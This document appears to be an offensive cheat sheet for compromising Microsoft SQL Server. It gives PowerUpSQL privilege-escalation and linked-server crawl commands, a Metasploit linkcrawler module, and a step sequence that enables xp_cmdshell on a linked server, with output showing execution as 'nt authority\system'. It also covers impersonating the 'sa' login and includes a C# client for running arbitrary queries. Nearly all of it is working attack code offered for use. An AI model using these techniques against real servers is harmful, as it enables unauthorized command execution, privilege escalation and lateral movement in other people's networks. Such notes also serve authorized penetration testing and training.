MSSQL
PowerUpSQL
Get-SQLServerLink -Instance server -Verbose
powershell.exe -c "Import-Module C:\Users\Public\PowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORP\sql01"Linked servers
select srvname from master..sysservers;Native
Get-SQLServerLinkCrawl -Instance server -Query "exec master..xp_cmdshell 'whoami'"Linked database tables
select * from openquery(foo, 'select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES') Meterpreter module,
exploit/windows/mssql/mssql_linkcrawler
Mssqlclient.py,
execute ('sp_configure ''show advanced options'', 1') at sql99;
execute (' reconfigure; ') at sql99;
execute (' sp_configure ''xp_cmdshell'',1 ') at sql99;
execute (' reconfigure; ') at sql99;
execute (' xp_cmdshell ''whoami'' ') at sql99;
SQL> execute (' xp_cmdshell ''whoami'' ') at sql99;
output
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
nt authority\system
NULL
Impersonation
Check if you can impersonate to other users,
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'You can then impersonate to those users use,
EXECUTE AS LOGIN = 'sa';You can verify the impersonation using,
select SYSTEM_USER;Mssql Client in C#
Compile using `csc.exe mssql_client.cs`.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Data.SqlClient;
using System.Collections;
namespace SQL
{
public class SQL
{
static String Run(SqlConnection con, string execCmd)
{
SqlCommand command = new SqlCommand(execCmd, con);
SqlDataReader reader = command.ExecuteReader();
String res = "";
while (reader.Read())
{
res += reader[0] + "\n";
}
reader.Close();
return res;
}
public static void Main(string[] args)
{
String sqlServer = args[0];
String database = "master";
String command = (args.Length > 1 ? args[1] : "");
String conString = "Server = " + sqlServer + "; Database = " + database + "; Integrated Security = True;";
using (SqlConnection con = new SqlConnection(conString))
{
try
{
con.Open();
Console.WriteLine("Auth success!");
}
catch
{
Console.WriteLine("Auth failed");
return;
}
String user = Run(con, "select SYSTEM_USER").Trim();
String login = Run(con, "select USER_NAME()").Trim();
Console.WriteLine(String.Format("[+] User: {0}", user));
Console.WriteLine(String.Format("[+] Login: {0}", login));
if (args[1] == "/i")
{
// while loop
String query = "";
while (true)
{
Console.Write("#>");
query = Console.ReadLine();
if (query == "exit")
{
return;
}
Console.WriteLine("[+] Executing query: {0}", query);
try
{
Console.WriteLine(Run(con, query));
}
catch
{
Console.WriteLine("[!] Failed to execute the query");
Console.WriteLine(Run(con, query));
}
}
return;
}
foreach (String sql in command.Split('\n'))
{
if (sql.Trim().Length > 0)
{
Console.WriteLine(Run(con, sql));
}
}
}
}
}
}.\sql.exe localhost /i
.\sql.exe localhost 'select @@version'Last updated